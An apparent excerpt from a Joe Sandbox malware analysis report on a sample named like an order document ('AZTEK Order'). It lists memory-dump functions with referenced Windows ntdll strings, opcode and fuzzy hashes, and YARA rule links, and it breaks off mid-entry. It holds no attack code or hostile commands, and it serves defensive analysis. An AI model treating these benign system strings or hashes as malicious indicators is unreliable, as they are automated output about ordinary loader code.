                                                      • Opcode ID: 4805b29094f017f8da28ad4f86105c0e526c04478e92e3d4ffd261c9fdbad546
                                                      • Instruction ID: 6ec6246460fb5a6fada40ab8b3c37fde6894f4bf332429c5d9b9a835b9bc28bb
                                                      • Opcode Fuzzy Hash: 4805b29094f017f8da28ad4f86105c0e526c04478e92e3d4ffd261c9fdbad546
                                                      • Instruction Fuzzy Hash: 59917D71508349AFDB22DF65CC44FABFAECBB88744F84092EF685D6155E370DA048B62
                                                      Function 017D273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018122B6
                                                      • SXS: %s() passed the empty activation context, xrefs: 018121DE
                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018121D9, 018122B1
                                                      • .Local, xrefs: 017D28D8
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                      • API String ID: 0-1239276146
                                                      • Opcode ID: 91c28e2e759cda5b569ba2a1f752b4a323173bd178abedf8e0d12165edb6ee21
                                                      • Instruction ID: 4f97195c9fc8651cebf8d861fe21d884024ee1c5286d67f284f5674370681cf4
                                                      • Opcode Fuzzy Hash: 91c28e2e759cda5b569ba2a1f752b4a323173bd178abedf8e0d12165edb6ee21
                                                      • Instruction Fuzzy Hash: E6A1C03194122DDFDB25CF68C888BA9F7B5BF58314F2401E9D908AB256D7309E81CF90
                                                      Function 017D4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01813437
                                                      • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01813456
                                                      • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0181342A
                                                      • RtlDeactivateActivationContext, xrefs: 01813425, 01813432, 01813451
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                      • API String ID: 0-1245972979
                                                      • Opcode ID: 44fe8e271359f3b9e23f213a9400fa490d375886f7bdef555ccbd332825eb700
                                                      • Instruction ID: f827aaa253511f07f5cc9b38aaee6bba9dc7ff6af19dcea924307b7d8ac94e08
                                                      • Opcode Fuzzy Hash: 44fe8e271359f3b9e23f213a9400fa490d375886f7bdef555ccbd332825eb700
                                                      • Instruction Fuzzy Hash: 176124726807169BD722CF1CC881B2AF7F5BFA4B20F148519E95ADB644D730E941CB91
                                                      Function 017A64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018010AE
                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0180106B
                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01800FE5
                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01801028
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                      • API String ID: 0-1468400865
                                                      • Opcode ID: 42431324ea6695420e2989135e2151e483dcb75beaba0c8c0168d8be2ec0a473
                                                      • Instruction ID: 7c2dfa66eff94d1b5470e780fa78d6fbd5856dd6ffbe67510d604925c53b3877
                                                      • Opcode Fuzzy Hash: 42431324ea6695420e2989135e2151e483dcb75beaba0c8c0168d8be2ec0a473
                                                      • Instruction Fuzzy Hash: C271C3B19043059FCB21DF14C888B97BFE8EF95764F540569F9888B28AD734D688CBD2
                                                      Function 017C245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0180A992
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0180A9A2
                                                      • LdrpDynamicShimModule, xrefs: 0180A998
                                                      • apphelp.dll, xrefs: 017C2462
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-176724104
                                                      • Opcode ID: 1836759d7ec87bebdc92d93b1b5ce7f0560309a7fb7cef96cb8869f257802dd9
                                                      • Instruction ID: 65cee056b2066928d82769b987613b0d3d33d695c8ffef7258e9a05a6f5d972e
                                                      • Opcode Fuzzy Hash: 1836759d7ec87bebdc92d93b1b5ce7f0560309a7fb7cef96cb8869f257802dd9
                                                      • Instruction Fuzzy Hash: 0B312772700305ABDB369F6D9D85A7AB7B5FB80B04F29005DE910EB299D7705B82CB80
                                                      Function 017B29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • HEAP[%wZ]: , xrefs: 017B3255
                                                      • HEAP: , xrefs: 017B3264
                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017B327D
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                      • API String ID: 0-617086771
                                                      • Opcode ID: 16dc682f4d2ee67e52a6bb5a24a578ca7dd555d83f7b3c3cbc0e359aba17dc6d
                                                      • Instruction ID: 114ac5d1014d6d2fd51be5f960bc4d271419f2ce705a0e88e9c81ced2bce6c37
                                                      • Opcode Fuzzy Hash: 16dc682f4d2ee67e52a6bb5a24a578ca7dd555d83f7b3c3cbc0e359aba17dc6d
                                                      • Instruction Fuzzy Hash: F1929971A056499FEB25CF68C484BEEFBF1FF48304F188099E859AB352D734A985CB50
                                                      Function 017B0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-4253913091
                                                      • Opcode ID: 24d50d3dfe758391640b4acea3a71b3aa78b3169d22b228498c02cb757a019be
                                                      • Instruction ID: 3f3996ded880afc01c262e04e5cee863ba4d9cb064f5ea5ec26da780ab3128a9
                                                      • Opcode Fuzzy Hash: 24d50d3dfe758391640b4acea3a71b3aa78b3169d22b228498c02cb757a019be
                                                      • Instruction Fuzzy Hash: 04F17B7060060ADFEB26CF68C894BAAF7B5FF44304F1441A9E516DB391D734AA81CFA1
                                                      Function 017C6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $@
                                                      • API String ID: 0-1077428164
                                                      • Opcode ID: 70c9501eb635ed5d2eef33731bf65b3c56e701169e99d3c1a26974bcb5fa1e09
                                                      • Instruction ID: db0707ec75cb0474648c57400a13013647d83ae859605bd890c0634074a79e99
                                                      • Opcode Fuzzy Hash: 70c9501eb635ed5d2eef33731bf65b3c56e701169e99d3c1a26974bcb5fa1e09
                                                      • Instruction Fuzzy Hash: E6C290716083459FE769CF28C881BABFBE5AF88B14F04896DF989C7241DB34D944CB52
                                                      Function 0179A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                      • API String ID: 0-2779062949
                                                      • Opcode ID: 97e4e7e7379262eeb8cff11c63078b1cb7e05f461d1ac563fd52151afba5f523
                                                      • Instruction ID: 7d9f31a89f7b89aeaaaf4388369b03823759dc53d1df58ea0e69746753f3fa86
                                                      • Opcode Fuzzy Hash: 97e4e7e7379262eeb8cff11c63078b1cb7e05f461d1ac563fd52151afba5f523
                                                      • Instruction Fuzzy Hash: 57A14A759116299BDF329B68CC88BAAF7B8EF48710F1001E9EA09A7251D7359E84CF50
                                                      Function 017C0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrpCheckModule, xrefs: 0180A117
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0180A121
                                                      • Failed to allocated memory for shimmed module list, xrefs: 0180A10F
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-161242083
                                                      • Opcode ID: b54eb3421b3a0df75b2ec7ed461942374df49d9a9a0e005fd34bd210693f3fdc
                                                      • Instruction ID: c0f141cecd5a7ec74cc0d1f0bc4d602f08999daa9e16230af325f2f954067b4d
                                                      • Opcode Fuzzy Hash: b54eb3421b3a0df75b2ec7ed461942374df49d9a9a0e005fd34bd210693f3fdc
                                                      • Instruction Fuzzy Hash: 38719E75A00209DFDB2ADF68C985ABEF7F4FB44704F18406DE912EB255E734AA41CB90
                                                      Function 017B0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-1334570610
                                                      • Opcode ID: 44147ca5563ebd76c120552d636d8a613f08ba5623473f57d27964ec0595ac6d
                                                      • Instruction ID: e2e80ba0867003d9a3af703f4812f989f7b952425e9f15f0da59700d005ab3d6
                                                      • Opcode Fuzzy Hash: 44147ca5563ebd76c120552d636d8a613f08ba5623473f57d27964ec0595ac6d
                                                      • Instruction Fuzzy Hash: F361AB716003059FDB29CF28C884BABFBB1FF45704F15859AE449CB292D770E981CB91
                                                      Function 017DC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Failed to reallocate the system dirs string !, xrefs: 018182D7
                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 018182DE
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 018182E8
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1783798831
                                                      • Opcode ID: 05a14882493560adde4f671eb49abee18977e27c928243928f52b98de96ceeb6
                                                      • Instruction ID: b87413ee3b8bd93655c1830a29b9edae4c492469d0ea60f01504acc292a04135
                                                      • Opcode Fuzzy Hash: 05a14882493560adde4f671eb49abee18977e27c928243928f52b98de96ceeb6
                                                      • Instruction Fuzzy Hash: C94125B2541305ABC722EB68DC89B5BB7F8AF48720F19092EF955C3258E770D900CBD1
                                                      Function 0185C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • PreferredUILanguages, xrefs: 0185C212
                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0185C1C5
                                                      • @, xrefs: 0185C1F1
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                      • API String ID: 0-2968386058
                                                      • Opcode ID: db87d6dc4b53afac7f0f10706b11c36a9011abb110334b19768aaaa78fc24431
                                                      • Instruction ID: fdef3bdb83965e3a5db392fe3fdfcf626b9385d07723b3fe6b77b9f90721a755
                                                      • Opcode Fuzzy Hash: db87d6dc4b53afac7f0f10706b11c36a9011abb110334b19768aaaa78fc24431
                                                      • Instruction Fuzzy Hash: 3D414F75A00209ABDF51DAD8C895BEEFBBCEB14744F14406AEA09F7284D7749A448F90
                                                      Function 01834144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                      • API String ID: 0-1373925480
                                                      • Opcode ID: f8439bf11a5c253ec0a045d0612daf6b6c660ee3593e2f4b51cb0ce2d2d11fa4
                                                      • Instruction ID: 6b6053061c039eec3f4e128d070b8199b29d6c8a53a199562ea4480c5d809fb3
                                                      • Opcode Fuzzy Hash: f8439bf11a5c253ec0a045d0612daf6b6c660ee3593e2f4b51cb0ce2d2d11fa4
                                                      • Instruction Fuzzy Hash: 3F412631A00A58CBEB26DFD8C844BADBBB8FF95344F180459D901FB791D7748A41CB90
                                                      Function 01824755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01824888
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01824899
                                                      • LdrpCheckRedirection, xrefs: 0182488F
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                      • API String ID: 0-3154609507
                                                      • Opcode ID: 7b0d25a13636c6a366fb5e92bba212097d218741eab4ed04ccaf9d47da370144
                                                      • Instruction ID: 41d53f930765fbe951db4198f86b73259493aed621d9725720733f8b19d922f6
                                                      • Opcode Fuzzy Hash: 7b0d25a13636c6a366fb5e92bba212097d218741eab4ed04ccaf9d47da370144
                                                      • Instruction Fuzzy Hash: C441D072A102759FCB23CE6CD840A26BBE4BF49B50F060269ED58D7311D770DA80CBA1
                                                      Function 017B0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-2558761708
                                                      • Opcode ID: 97fdcd5c099f568493abfc82be72c135dfc62a2a8753803b533ebe45edf54e5a
                                                      • Instruction ID: 3c763fe673eaabd453c88562c3eda205688897da9d3ffc08dcdd715f5078d7bd
                                                      • Opcode Fuzzy Hash: 97fdcd5c099f568493abfc82be72c135dfc62a2a8753803b533ebe45edf54e5a
                                                      • Instruction Fuzzy Hash: C711DE7131450ACFDB6ACB18D8D4BABF3A4AF40B15F198159F006CB291DB30D940CB61
                                                      Function 018220DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01822104
                                                      • Process initialization failed with status 0x%08lx, xrefs: 018220F3
                                                      • LdrpInitializationFailure, xrefs: 018220FA
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2986994758
                                                      • Opcode ID: 3e8caad0a20bef838692cd77537274fe8f954214c7c8820bcd4b9a92cede8d01
                                                      • Instruction ID: aa50c96267b2bac563a35ee17b113a3db54e1352fa5120a166370d33eba1a873
                                                      • Opcode Fuzzy Hash: 3e8caad0a20bef838692cd77537274fe8f954214c7c8820bcd4b9a92cede8d01
                                                      • Instruction Fuzzy Hash: 60F0F675680718BBEB25EB4CCC56F9977ADFB40B54F240069FA00F7285D6B0AB40CA91
                                                      Function 017B03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: #%u
                                                      • API String ID: 48624451-232158463
                                                      • Opcode ID: af856dd45e3858842d580cb129d1ec4d79de784fbcb72a2c67a249d12ecbc852
                                                      • Instruction ID: 8bdd5adc75cc3361716b9acef270047f066b38caef303b9d393b109b3891506f
                                                      • Opcode Fuzzy Hash: af856dd45e3858842d580cb129d1ec4d79de784fbcb72a2c67a249d12ecbc852
                                                      • Instruction Fuzzy Hash: B5712C71A0014A9FDB12DFA8C994FAEB7F8BF18704F144065EA05E7255EB38EE41CB61
                                                      Function 017AA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrResSearchResource Enter, xrefs: 017AAA13
                                                      • LdrResSearchResource Exit, xrefs: 017AAA25
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                      • API String ID: 0-4066393604
                                                      • Opcode ID: e561ea46d94a95167e68c2cabc55a0b1a96a2a87c9e5414e44ba4be6cad99673
                                                      • Instruction ID: 8e0c5c59ec8719c7be617b8fc3eaa9466676a8af4b95157da276ee48e9baad7a
                                                      • Opcode Fuzzy Hash: e561ea46d94a95167e68c2cabc55a0b1a96a2a87c9e5414e44ba4be6cad99673
                                                      • Instruction Fuzzy Hash: 12E19471E00219DFEB22CF99CD94BAEFBBABF98350F500569E901E7291D7749A40CB50
                                                      Function 0186A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `$`
                                                      • API String ID: 0-197956300
                                                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                      • Instruction ID: 938ade231ab903273e5c5ada9832a35f0349b64c84c53a83b7445840692d7f5c
                                                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                      • Instruction Fuzzy Hash: DAC1F4312043469BE729CF28C845B6BBBE9BFC4318F084A2CF696DB291D775DA05CB51
                                                      Function 0181E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Legacy$UEFI
                                                      • API String ID: 2994545307-634100481
                                                      • Opcode ID: 81831ca1a5822f4b9ab8b349a174a10d0213d700c9ab883cd56713c01c84fb4b
                                                      • Instruction ID: cd5b13cd146aec8802ab59db9cd1e2b5a905611da4bc6a218c1f4915006d26fb
                                                      • Opcode Fuzzy Hash: 81831ca1a5822f4b9ab8b349a174a10d0213d700c9ab883cd56713c01c84fb4b
                                                      • Instruction Fuzzy Hash: 00616072E003099FEB15DFA8C844BAEBBF9FB48704F14446DEA59EB255D731AA40CB50
                                                      Function 018443D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$MUI
                                                      • API String ID: 0-17815947
                                                      • Opcode ID: 31972d8d4cfc29f41193b0065d3c17de1916a6694a44d75512a94ba90a0db813
                                                      • Instruction ID: fc34e15d1f17c03acce5b161a2afc7cf080d5e6bf77ebceb4df8b4ca8af2d50e
                                                      • Opcode Fuzzy Hash: 31972d8d4cfc29f41193b0065d3c17de1916a6694a44d75512a94ba90a0db813
                                                      • Instruction Fuzzy Hash: 3D512871E0021DAFDF11DFA9CC84BEEBBBDAB48754F100529E615F7291DA709A05CBA0
                                                      Function 017A04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • kLsE, xrefs: 017A0540
                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 017A063D
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                      • API String ID: 0-2547482624
                                                      • Opcode ID: 917546f4b31fc088232d7f305954283a8be56573576591b95c124f2b2df73c8e
                                                      • Instruction ID: e6cd202b16fc595f3a1bb8aed7baaa13bddfd9b978bb5464d4a3c53912e9dc2f
                                                      • Opcode Fuzzy Hash: 917546f4b31fc088232d7f305954283a8be56573576591b95c124f2b2df73c8e
                                                      • Instruction Fuzzy Hash: CC519A715047428FD724EF68C444AA7FBE4AFC4308F644E3EEAEA87241E770A545CB92
                                                      Function 017AA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 017AA2FB
                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 017AA309
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                      • API String ID: 0-2876891731
                                                      • Opcode ID: b3c7ac52690a14b1b29e8c8109a116cac445f9a6f141aef4d83108eaa7bdfbb5
                                                      • Instruction ID: 0202c504af76c636a9454b9fda2ce6feb1891ddf0dba23fbd0ba0baf248917d2
                                                      • Opcode Fuzzy Hash: b3c7ac52690a14b1b29e8c8109a116cac445f9a6f141aef4d83108eaa7bdfbb5
                                                      • Instruction Fuzzy Hash: 7C41E130A04659DBEB12CF6DC894B6EBBB5FF85300F1441A5E900DB291E7B5DA40CB41
                                                      Function 017DA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Cleanup Group$Threadpool!
                                                      • API String ID: 2994545307-4008356553
                                                      • Opcode ID: 71f7f20df48773cad8d19ec64af6a0565ecf4faa2b837760805c69c989191f11
                                                      • Instruction ID: 8449aaa76f2dc418e5a0ff2cb4cf5c349369a78130bda45f353e80901d28f71e
                                                      • Opcode Fuzzy Hash: 71f7f20df48773cad8d19ec64af6a0565ecf4faa2b837760805c69c989191f11
                                                      • Instruction Fuzzy Hash: DD01D1B2244708EFE311DF14CD49B26B7F8FB84715F058979A648C7190E374D904CB46
                                                      Function 017AC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: MUI
                                                      • API String ID: 0-1339004836
                                                      • Opcode ID: f739975bf6fac3474c5434adec5c5d54aef60fe0cc127983d1e6d5788b303409
                                                      • Instruction ID: 94453ae562ebc6daa369c65ab1f43bdfcf6fc7832dea6bc3d6af40b7d38bd2e1
